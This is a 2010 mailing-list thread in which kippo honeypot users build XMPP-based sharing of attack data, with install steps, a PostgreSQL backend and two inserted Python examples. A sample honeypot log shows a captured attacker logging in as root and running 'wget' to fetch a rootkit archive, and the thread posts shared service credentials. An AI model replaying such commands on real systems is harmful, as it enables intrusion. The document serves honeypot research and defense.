A free Weekend, finally


Jacob

Oct 9, 2010, 6:03:08 PM
to kippo...@googlegroups.com
Sorry everyone for being quiet after starting this group, but I was offered a job on the other side of the country and needed to move, start work, and all the stuff that goes with that. But I found myself with a free weekend and I decided it was a good time to set up a server with, at least in the beginning, a blog for us to collectively write about kippo and honeypots in general. We can as a group decide whether we want to do something different. Now, I have no problem setting up a VPS to solely host the website and whatever other stuff we want to have there for group access. But if someone has another idea, I am willing to hear it. The second thing is, I have no clue what domain to get for this website. Anyone have any ideas?

- biosshadow


Justin Elze

Oct 9, 2010, 6:27:31 PM
to kippo...@googlegroups.com
I was hoping we could track stats on backdoors/ircbots, popular logins, origin of attack based on country, place hosting the backdoor/ircbot based on country, possibly Google Maps integration.

A number of us have also expanded to using other honeypots; we could also track stats from those at some point.

If you need a domain I can lend you hackpwn.net :-)

Justin



--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.




Justin Elze

Oct 22, 2010, 9:22:21 AM
to kippo...@googlegroups.com
Bump since everyone is back to only chatting on twitter about this...

Any interest in a centralized MySQL database starting off with a few people and tracking results from around the world?

Jacob Kuehndorf

Oct 22, 2010, 9:41:32 AM
to kippo...@googlegroups.com

I am interested in this. Not sure how many other people are, but it would make sharing stats easier.


AndrewWaite

Oct 22, 2010, 9:43:22 AM
to kippo users
Justin,

Theoretically it should be simple, it just needs a publicly accessible MySQL
daemon and people to reconfigure their sensors. However, I can see a
number of problems before this can/will get off the ground:

1> Beyond trust, how can we verify that people aren't screwing with
the data, uploading bogus info etc.?
2> How do we (safely and securely) allow those contributing access to
their data with the same abilities as if they ran locally?
3> How do we handle losing localised data collection for 'my' sensor?

For me 3 would be the biggest hurdle, as I wouldn't want to lose
access to my own data (I'm assuming others feel similar?). I haven't
looked at the source; how easy would it be to patch/update Kippo to
log simultaneously to multiple sources?

Does the central repository need to be in real-time? Or could we
develop utilities to duplicate local logging to the central repository
(daily/weekly cron job)?

Just thinking out loud, thoughts?

--Andrew


Markus

Oct 22, 2010, 10:26:01 AM
to kippo...@googlegroups.com
Hi,

Andrew top posting?

> Justin Elze wrote:
>> Bump since everyone is back to only chatting on twitter about this...
>>
>> Any interest in a centralized MySQL database starting off with a few people
>> and tracking results from around the world?

On Fri, Oct 22, 2010 at 3:43 PM, AndrewWaite <a...@infosanity.co.uk> wrote:
> theoretically should be simple, just needs a publicly accessible MySQL
> daemon and people to reconfigure there sensors. However, I can see a
> number of problems before this can/will get off the ground:

central db? bad idea for all obvious reasons.
I'd go for a distributed network and everybody can have his own
database, with information from all sensors as outlined? here:
http://groups.google.com/group/kippousers/msg/f0d0ecb823e67f0e

I set up docs on how to install prosody and host a branch of the code with
the patches applied, http://carnivore.it/2010/10/13/xmpp_server


Markus

Justin Elze

Oct 22, 2010, 11:08:52 AM
to kippo...@googlegroups.com
Are you going to rewrite Kippo to export data into an XMPP server?

This is what happened last time: everyone jumped in with great ideas but no real motivation to follow up.

I was only talking about using a few people I have some level of trust with initially to add to a database with a website front end for results.

No issues if someone wants to make XMPP work with kippo since it obviously scales well. Kippo isn't going to catch some 0day attack or anything overly interesting.

However, I was more interested in statistical information: source IP, source country, password combos, where backdoors are hosted.

I was hoping to use this information in training scenarios to educate people. With the general security awareness level rising this should no longer be an effective attack vector; however, people are continuing to scan, which means it's producing results.

Justin




Upi Tamminen

Oct 22, 2010, 11:53:11 AM
to kippo...@googlegroups.com
Until I add support for multiple log destinations, one simple way of logging
to a secondary target would be to write a little program that reads the
local database and sends data to the secondary database.

It could write to an additional table in the local kippo database to keep
track of which sessions have been sent forward.

Something like this would be easy for anyone to implement in their favorite
language and platform, and hopefully my laziness with kippo development isn't
hurting deployments like this :)
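One way to implement the forwarder Upi describes, as an added example that is not kippo's own code: it reads finished sessions and their login attempts from the local database, pushes them to a secondary database, and records each forwarded session in an extra local table so reruns (e.g. from cron) only send new sessions. The schema is a constructed, reduced stand-in for kippo's MySQL tables and both databases are in-memory sqlite3 so it runs offline; pointing it at MySQL means swapping the connections and the placeholder style.

```python
import sqlite3

# Constructed, reduced stand-in for kippo's MySQL sessions/auth tables (assumption).
KIPPO_SCHEMA = """
CREATE TABLE sessions (id TEXT PRIMARY KEY, starttime TEXT, endtime TEXT, ip TEXT);
CREATE TABLE auth (id INTEGER PRIMARY KEY, session TEXT, success INTEGER,
                   username TEXT, password TEXT, timestamp TEXT);"""
# The additional local-only bookkeeping table Upi describes.
FORWARDED_SCHEMA = "CREATE TABLE forwarded (session TEXT PRIMARY KEY, sent_at TEXT);"
# Constructed sample data: two finished sessions and one still open (endtime NULL).
SESSIONS = [
    ("da2dde7c2e9b4f96bdd94172eb274c9f", "2010-10-22 09:00:00", "2010-10-22 09:01:10", "192.0.2.10"),
    ("349ae44535d34bab9c548f3af21f0fcd", "2010-10-22 09:05:00", "2010-10-22 09:05:40", "198.51.100.7"),
    ("0123456789abcdef0123456789abcdef", "2010-10-22 09:09:00", None, "203.0.113.5"),
]
AUTH = [  # (session, success, username, password, timestamp)
    ("da2dde7c2e9b4f96bdd94172eb274c9f", 0, "root", "test", "2010-10-22 09:00:02"),
    ("da2dde7c2e9b4f96bdd94172eb274c9f", 1, "root", "123456", "2010-10-22 09:00:05"),
    ("349ae44535d34bab9c548f3af21f0fcd", 1, "admin", "admin", "2010-10-22 09:05:01"),
    ("0123456789abcdef0123456789abcdef", 0, "root", "toor", "2010-10-22 09:09:03"),
]

def open_db(local):
    """Local sensor database (sample rows + bookkeeping table) or the empty remote one."""
    db = sqlite3.connect(":memory:")
    db.executescript(KIPPO_SCHEMA + (FORWARDED_SCHEMA if local else ""))
    if local:
        db.executemany("INSERT INTO sessions VALUES (?,?,?,?)", SESSIONS)
        db.executemany("INSERT INTO auth (session, success, username, password, timestamp) "
                       "VALUES (?,?,?,?,?)", AUTH)
    return db

def forward_sessions(local, remote):
    # Finished sessions with no row in `forwarded` are the ones still to push.
    pending = local.execute(
        "SELECT s.id, s.starttime, s.endtime, s.ip FROM sessions s LEFT JOIN forwarded f "
        "ON f.session = s.id WHERE f.session IS NULL AND s.endtime IS NOT NULL").fetchall()
    sent = 0
    for sid, start, end, ip in pending:
        # A crash between remote commit and local mark leaves the session remote-side already.
        if not remote.execute("SELECT 1 FROM sessions WHERE id = ?", (sid,)).fetchone():
            attempts = local.execute("SELECT session, success, username, password, "
                                     "timestamp FROM auth WHERE session = ?", (sid,)).fetchall()
            try:
                with remote:  # one transaction per session: session row plus auth rows, or nothing
                    remote.execute("INSERT INTO sessions VALUES (?,?,?,?)", (sid, start, end, ip))
                    remote.executemany("INSERT INTO auth (session, success, username, password, "
                                       "timestamp) VALUES (?,?,?,?,?)", attempts)
            except sqlite3.Error:
                continue  # not marked, so the next (cron) run retries it
        with local:  # mark only once the remote copy is known to exist
            local.execute("INSERT INTO forwarded VALUES (?, datetime('now'))", (sid,))
        sent += 1
    return sent
```

Open sessions are skipped until kippo records their endtime, so a session is never forwarded half-written.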


Leon v/d Eijk

Oct 22, 2010, 12:20:38 PM
to kippo...@googlegroups.com
Sounds good Upi. It is your project, so whoever calls you lazy should
get their priorities straight mate. If you need testers just roar :)

Markus

Oct 22, 2010, 4:29:22 PM
to kippo...@googlegroups.com
Hi,

On Fri, Oct 22, 2010 at 5:08 PM, Justin Elze <formu...@gmail.com> wrote:
> Are you going to rewrite Kippo to export data into a xmpp server?

Actually I doubt a rewrite would be required in any way, it would plug
in the same way as mysql, and twisted even has multiple protocol
implementations for xmpp.

> This is what happened last time everyone jumped in with great ideas but no
> real motivation to follow up.

How can you expect anybody to contribute anything if there is no final
"we are interested in the functionality and accept patches" or at
least a basic level of interest?

> No issues if someone wants to make XMPP work with kippo since it obviously
> scales well....Kippo isn't going to catch some 0day attack or anything
> overly interesting.

I don't see the point.

> However was more interested in statistical information source IP, source
> country, password combos, where backdoors are hosted.

Which is exactly the information one could distribute via xmpp.


If you want to look at it before making a point, let me hook you up
with the required credentials to do so.


Markus

Justin Elze

Oct 22, 2010, 6:39:28 PM
to kippo...@googlegroups.com
I'm not knocking XMPP or you in any fashion; I am guessing that is how you took my last email.

Last time we ran through this, everyone made different suggestions and then the topic died. All I want is a solution to aggregate results which can be usable in the somewhat near future.



Would you be the person developing the XMPP integration? What assistance/resources would you need?


Anyone else have useful suggestions?







Markus

Oct 23, 2010, 1:19:01 AM
to kippo...@googlegroups.com
Hi,

On Sat, Oct 23, 2010 at 12:39 AM, Justin Elze <formu...@gmail.com> wrote:
> Would you be the person developing the XMPP integration? What
> assistance/resources would you need?

Testers,

svn co https://svn.ik.nu/wokkel/branches/wokkel-muc-client-support-24 wokkel
cd wokkel
python setup.py install

svn checkout http://kippo.googlecode.com/svn/trunk/ kippo-xmpp
cd kippo-xmpp
wget http://p.carnivore.it/Kx015D?download -O /dev/stdout | patch -p0
cp kippo.cfg.dist kippo.cfg
# edit kippo.cfg, allow the xmpp section, edit kippo-revents to kippo-events
twistd -ny kippo.tac

-------------------
todo?
* currently it replaces the mysql logging, I did not understand the
twisted thing to have multiple log observers, should be fixed by
somebody who understands twisted
* the xmpp client is initialized in the tac file, it does not start
initialized somewhere else, I *guess* thats a twisted feature, but
maybe somebody who understands twisted can fix it
* set self.xmppclient.logTraffic to False if you are annoyed by the
messages (/dblog/xmpp.py:57)
* the code supports anonymizing the honeypot's IP address, this is
turned on by default and there is no config option yet to turn it off,
so the honeypot always reports itself as 127.0.0.1
* xmlns url for kippo is wrong
* bribe somebody to apply the patch to svn, so we can beautify it
* backend code to retrieve the messages from xmpp and store in a
database, I'd adjust the pg_backend code dionaea ships with to deal
with the kippo namespace & messages

documentation?
* it uses a special wokkel branch, which adds muc to twisted's xmpp stack.
* you specify an xmpp server, username, password, muc, and channels for
the different signals you have (client connected, client disconnected,
command, login, ...), and it joins the channel and sends the message
to the channel.
* once ssh-action happens, it sends a properly formatted xml message to
the channel. I figured out the xml format myself; it is similar to the
format I use for dionaea.

Some example messages:

CreateSession:
<kippo xmlns='http://http://kippo.googlecode.com'
type='createsession'><session local_host='127.0.0.1' local_port='2222'
session='da2dde7c2e9b4f96bdd94172eb274c9f' remote_host='192.168.53.21'
remote_port='4271'/></kippo>

ConnectionLost:
<kippo xmlns='http://http://kippo.googlecode.com'
type='connectionlost'><session
session='da2dde7c2e9b4f96bdd94172eb274c9f'/></kippo>

Command:
<kippo xmlns='http://http://kippo.googlecode.com'
type='command'><command session='349ae44535d34bab9c548f3af21f0fcd'
command='known'>cd /tmp</command></kippo>


Yep, there is *some* overhead, but it is easy to parse.


> Anyone else have useful suggestions?

Yep, I set up a privileged account for you. If you want to hack a
backend based on pg_backend, you can use the user
ki...@sensors.carnivore.it with password kippo;
you have elevated privileges on the channel kippo-events in the
dionaea.sensors.carnivore.it muc, so there is no reason not to start
hacking on it.

If you access the service with an xmpp client like psi, turn on the
"XML Console", as the messages are unencoded xml and psi does not
render them properly.

If nobody stands up, I'll contribute the backend code too, and I
promise it won't be mysql compatible.


Markus
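An added example of the receiving side (not part of Markus's patch or of pg_backend): it parses the three message types shown above with the standard-library ElementTree and validates every field before anything would reach a database, since the sensors posting to the MUC are remote and, as Andrew noted, only partly trusted. It matches on the local tag name only, so it accepts the namespace exactly as currently emitted, and it treats `unknown` as the assumed counterpart of the `known` command flag, which the mail does not show.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

SESSION_RE = re.compile(r"^[0-9a-f]{32}$")  # kippo session ids are 32 hex chars

# Constructed copies of the three sample messages from the mail (namespace as posted).
SAMPLES = [
    "<kippo xmlns='http://http://kippo.googlecode.com' type='createsession'>"
    "<session local_host='127.0.0.1' local_port='2222' "
    "session='da2dde7c2e9b4f96bdd94172eb274c9f' remote_host='192.168.53.21' "
    "remote_port='4271'/></kippo>",
    "<kippo xmlns='http://http://kippo.googlecode.com' type='connectionlost'>"
    "<session session='da2dde7c2e9b4f96bdd94172eb274c9f'/></kippo>",
    "<kippo xmlns='http://http://kippo.googlecode.com' type='command'>"
    "<command session='349ae44535d34bab9c548f3af21f0fcd' command='known'>cd /tmp</command>"
    "</kippo>",
]

def _local(tag):
    # Match on the local name only; the xmlns URL is known to be wrong for now.
    return tag.rsplit("}", 1)[-1]

def _port(value):
    port = int(value or -1)  # missing attribute -> -1 -> rejected below
    if not 0 < port < 65536:
        raise ValueError("bad port %r" % value)
    return port

def parse_kippo_event(xml_text, max_len=4096):
    """Turn one kippo payload into a dict, raising ValueError on anything malformed.
    Sensors are remote, so every field is checked before it is trusted or stored."""
    if len(xml_text) > max_len:
        raise ValueError("payload too large")
    root = ET.fromstring(xml_text)
    if _local(root.tag) != "kippo" or len(root) != 1:
        raise ValueError("not a kippo event")
    kind, child = root.get("type"), root[0]
    sid = child.get("session", "")
    if not SESSION_RE.match(sid):
        raise ValueError("bad session id %r" % sid)
    if kind == "createsession" and _local(child.tag) == "session":
        return {"type": kind, "session": sid,
                "local_host": str(ipaddress.ip_address(child.get("local_host"))),
                "local_port": _port(child.get("local_port")),
                "remote_host": str(ipaddress.ip_address(child.get("remote_host"))),
                "remote_port": _port(child.get("remote_port"))}
    if kind == "connectionlost" and _local(child.tag) == "session":
        return {"type": kind, "session": sid}
    if kind == "command" and _local(child.tag) == "command":
        flag = child.get("command")
        if flag not in ("known", "unknown"):  # 'unknown' assumed as the counterpart
            raise ValueError("bad command flag %r" % flag)
        return {"type": kind, "session": sid, "known": flag == "known",
                "input": (child.text or "")[:1024]}
    raise ValueError("unsupported event %r" % kind)
```

The returned dicts map directly onto parameterized inserts, which keeps attacker-typed command text out of the SQL itself.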

mlwrcollect

Oct 23, 2010, 6:05:34 AM
to kippo...@googlegroups.com
Lol, nice Markus! Gonna have a look.

mlwrcollect

Oct 23, 2010, 7:17:54 AM
to kippo...@googlegroups.com
Works like a charm ! :)
thx!


Tomasz Miklas

Oct 24, 2010, 12:59:16 PM
to kippo users
Hey Markus

That's awesome work you did here! I'm not a python person myself but
will look into it and maybe help somehow.
Will test XMPP code ASAP - that's the way to go IMHO...

Tomasz

Markus

Oct 24, 2010, 3:36:41 PM
to kippo...@googlegroups.com
Hi,

Client code:
Updated patch for latest kippo revision to report to xmpp:
http://p.carnivore.it/uUovYX

Installation as outlined in previous mail.

Backend code
code:
http://p.carnivore.it/RqMsyp
# aptitude install python-pyxmpp python-pgsql

with db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M dionaea.sensors.carnivore.it -C kippo-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/

without db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M dionaea.sensors.carnivore.it -C kippo-events -f /tmp/

Database schema addon which adds the required tables for kippo in the
kippo namespace:
http://p.carnivore.it/80XWG4
The schema is similar to kippo's own schema; basically I just got rid of
calling every primary key "id" to allow natural joining.

Basic instructions for the database; I don't remember all the steps, so in
case you get it working, please complete the steps required.

install postgres,
create a user "xmpp"
su postgres
createuser --no-createdb --encrypted --login --pwprompt --no-createrole --no-superuser xmpp

edit /etc/postgresql/8.4/main/pg_hba.conf
add a line to allow the xmpp user to connect to the database from
local host with password authentication
# TYPE  DATABASE  USER  CIDR-ADDRESS  METHOD
local   xmpp      xmpp                md5

restart postgres to have the changes taking effect.

create a database "xmpp"
createdb --owner xmpp xmpp

apply the schema, start the backend code
psql -U xmpp xmpp < theschema.sql

the backend code writes some status information on the console:
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] createsession: 127.0.0.1 127.0.0.1 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] version SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login False root test 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login True root 123456 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command cd /tmp 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command wget http://www.example.com/root/kit.tar.gz 2390be85d17645ecb3a0b936cd275dfe

Markus

Leon v/d Eijk

Oct 27, 2010, 10:36:46 AM
to kippo users
Works very well. I hope more people join in soon.
Great job Markus !

Leon
